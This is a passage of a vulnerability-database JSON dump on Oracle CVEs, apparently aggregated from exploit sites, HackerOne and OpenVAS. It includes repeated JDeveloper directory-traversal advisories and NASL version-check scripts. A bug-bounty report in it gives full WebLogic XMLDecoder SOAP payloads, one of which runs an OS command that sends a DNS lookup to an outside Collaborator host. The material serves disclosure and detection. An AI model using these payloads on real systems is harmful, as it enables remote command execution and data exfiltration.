12.2.1.2.0\r\n\r\n\r\nReferences:\r\n============\r\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\r\n\r\n\r\n\r\nExploit/POC:\r\n=============\r\n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands.\r\n2) import into JDeveloper\r\n3) files get moved outside target directories to one of the attackers choosing.\r\n4) attacker requests the malicious file contained in target directory.\r\n\r\nBAM!\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/29579", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-01-19T00:21:27", "description": "", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "packetstorm", "title": "Oracle JDeveloper IDE Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-18T00:00:00", "id": "PACKETSTORM:145966", "href": "https://packetstormsecurity.com/files/145966/Oracle-JDeveloper-IDE-Directory-Traversal.html", "sourceData": "`[+] Credits: John Page (aka hyp3rlinx) \n[+] Website: hyp3rlinx.altervista.org \n[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt \n[+] ISR: apparition security \n \n \nVendor: \n============= \nwww.oracle.com \n \n \nProduct: \n=========== \nJDeveloper IDE \n \nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based \napplications addressing every step of the application lifecycle. \n \n \n \nVulnerability Type: \n=================== \nDirectory Traversal \n \n \n \nCVE Reference: \n============== \nCVE-2017-10273 \n \n \n \nSecurity Issue: \n================ \nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives. \nLater, attackers can potentially request these scripts/files to execute system commands on affected target. \n \n \nAffected versions: \n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0 \n \n \nReferences: \n============ \nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html \n \n \n \nExploit/POC: \n============= \n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands. \n2) import into JDeveloper \n3) files get moved outside target directories to one of the attackers choosing. \n4) attacker requests the malicious file contained in target directory. \n \nBAM! \n \n \nNetwork Access: \n=============== \nLocal \n \n \n \nSeverity: \n========= \nLow \n \n \n \nDisclosure Timeline: \n============================= \nVendor Notification: October 14, 2016 \nVendor fixes as part of CPU January 16, 2018 \nJanuary 17, 2018 : Public Disclosure \n \n \n \n[+] Disclaimer \nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. \nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and \nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit \nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility \nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information \nor exploits by the author or elsewhere. All content (c). \n \nhyp3rlinx \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145966/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle JDeveloper 11.1.x12.x - Directory Traversal", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 4.7, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.7}, "published": "2018-01-21T00:00:00", "type": "exploitpack", "title": "Oracle JDeveloper 11.1.x12.x - Directory Traversal", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-21T00:00:00", "id": "EXPLOITPACK:65B3837C7995B55CBE45A13A505B8C67", "href": "", "sourceData": "[+] Credits: John Page (aka hyp3rlinx)\t\t\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt\n[+] ISR: apparition security \n \n\nVendor:\n=============\nwww.oracle.com\n\n\nProduct:\n===========\nJDeveloper IDE\n\nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based\napplications addressing every step of the application lifecycle.\n\n\n\nVulnerability Type:\n===================\nDirectory Traversal\n\n\n\nCVE Reference:\n==============\nCVE-2017-10273\n\n\n\nSecurity Issue:\n================\nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.\nLater, attackers can potentially request these scripts/files to execute system commands on affected target.\n\n\nAffected versions:\n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0\n\n\nReferences:\n============\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n\n\n\nExploit/POC:\n=============\n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands.\n2) import into JDeveloper\n3) files get moved outside target directories to one of the attackers choosing.\n4) attacker requests the malicious file contained in target directory.\n\nBAM!\n\n\nNetwork Access:\n===============\nLocal\n\n\n\nSeverity:\n=========\nLow\n\n\n\nDisclosure Timeline:\n=============================\nVendor Notification: October 14, 2016\nVendor fixes as part of CPU January 16, 2018\nJanuary 17, 2018 : Public Disclosure\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c).\n\nhyp3rlinx", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-06-05T15:38:04", "bounty": 0.0, "description": "##Description\nHello. I was able to identify 3 more RCE vulnerabilities due to the outdated Oracle Weblogic instance on the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\nAfter my previous discoveries I decided to dig deeper into the `\u2588\u2588\u2588.mil` scope/IP space and found other instances of vulnerable Oracle WebLogic. I decided to fill all this additional findings in the single report\n\n##POC\nThis request to the https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/wls-wsat/CoordinatorPortType will trigger sleep for 10 seconds (same applies for \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\u2588\u2588):\n\n```\nPOST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>10000</long>\n </object>\n </java> \n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\n\nThe next request will resolve custom Burp Collaborator hostname via `nslookup` OS command to prove that it's possible to exfiltrate data via DNS:\n```\nPOST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: \u2588\u2588\u2588\nContent-Length: 724\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n\t<soapenv:Header>\n\t\t<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n\t\t\t<java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n\t\t\t<void class=\"java.lang.ProcessBuilder\"> \n\t\t\t\t<array class=\"java.lang.String\" length=\"3\">\n\t\t\t\t<void index = \"0\">\n\t\t\t\t\t<string>cmd</string>\n\t\t\t\t</void>\n\t\t\t\t<void index = \"1\"> \n\t\t\t\t\t<string>/c</string> \n\t\t\t\t</void>\n\t\t\t\t<void index = \"2\">\n\t\t\t\t\t<string>nslookup j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net</string>\n\t\t\t\t</void>\n\t\t\t</array>\n\t\t\t<void method=\"start\"/>\n\t\t\t</void>\n\t\t\t</java>\n\t\t\t</work:WorkContext> \n\t</soapenv:Header> \n<soapenv:Body/>\n</soapenv:Envelope>\n```\n\n\nNote: to reproduce the second case with `nslookup`, `j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net` host should be replaced by your own Burp Collaborator instance to catch the DNS request\n\n##Suggested fix\nPatching WebLogic to the resent version will fix the issue.\n\n## Impact\n\nRemote OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2019-07-03T19:21:18", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote OS command Execution in the 3 more Oracle Weblogic on the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\u2588\u2588 [CVE-2017-10352]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": "2019-10-08T18:38:21", "id": "H1:634630", "href": "https://hackerone.com/reports/634630", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:49", "description": "The host is running Oracle WebCenter Content\n and is prone to an unspecified vulnerability.", "cvss3": {}, "published": "2018-03-06T00:00:00", "type": "openvas", "title": "Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-2564"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812959", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812959", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:webcenter_content\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812959\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-2564\");\n script_bugtraq_id(102541);\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-06 11:17:44 +0530 (Tue, 06 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); ##Patch is available as solution\n script_name(\"Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle WebCenter Content\n and is prone to an unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to error in the 'Content\n Server' component.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n can result in unauthorized creation, deletion or modification access to critical\n data or all Oracle WebCenter Content accessible data as well as unauthorized read\n access to a subset of Oracle WebCenter Content accessible data.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebCenter Content version 11.1.1.9.0\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_webcenter_content_detect.nasl\");\n script_mandatory_keys(\"Oracle/WebCenter/Content/Version\");\n script_require_ports(\"Services/www\", 80, 443);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!webPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:webPort, exit_no_version:TRUE)) exit(0);\nwebVer = infos['version'];\npath = infos['location'];\n\nif(webVer == \"11.1.1.9.0\")\n{\n report = report_fixed_ver(installed_version:webVer, fixed_version: \"Apply the patch\", install_path:path);\n security_message(port:webPort, data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T18:36:52", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-11-05T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bouncycastle (openSUSE-SU-2015:1911-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851127", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851127\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-11-05 06:19:57 +0100 (Thu, 05 Nov 2015)\");\n script_cve_id(\"CVE-2015-7940\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bouncycastle (openSUSE-SU-2015:1911-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bouncycastle'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bouncycastle was updated to version 1.53 to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-7940: Invalid curve attack (bsc#951727).\");\n\n script_tag(name:\"affected\", value:\"bouncycastle on openSUSE 13.2, openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:1911-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE13\\.2|openSUSE13\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"bouncycastle\", rpm:\"bouncycastle~1.53~13.3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bouncycastle-javadoc\", rpm:\"bouncycastle-javadoc~1.53~13.3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bouncycastle\", rpm:\"bouncycastle~1.53~8.3.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ouncycastle-javadoc\", rpm:\"ouncycastle-javadoc~1.53~8.3.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:36:12", "description": "Mageia Linux Local Security Checks mgasa-2015-0487", "cvss3": {}, "published": "2015-12-29T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0487", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310131170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0487.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131170\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-12-29 11:15:52 +0200 (Tue, 29 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0487\");\n script_tag(name:\"insight\", value:\"The Bouncy Castle Java library before 1.51 does not validate a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an invalid curve attack (CVE-2015-7940).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0487.html\");\n script_cve_id(\"CVE-2015-7940\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0487\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"bouncycastle\", rpm:\"bouncycastle~1.50~3.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:53:16", "description": "Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf", "cvss3": {}, "published": "2015-12-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3417-1 (bouncycastle - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703417", "href": "http://plugins.openvas.org/nasl.php?oid=703417", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3417.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3417-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703417);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-7940\");\n script_name(\"Debian Security Advisory DSA 3417-1 (bouncycastle - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-12-14 00:00:00 +0100 (Mon, 14 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3417.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bouncycastle on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\");\n script_tag(name: \"summary\", value: \"Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", 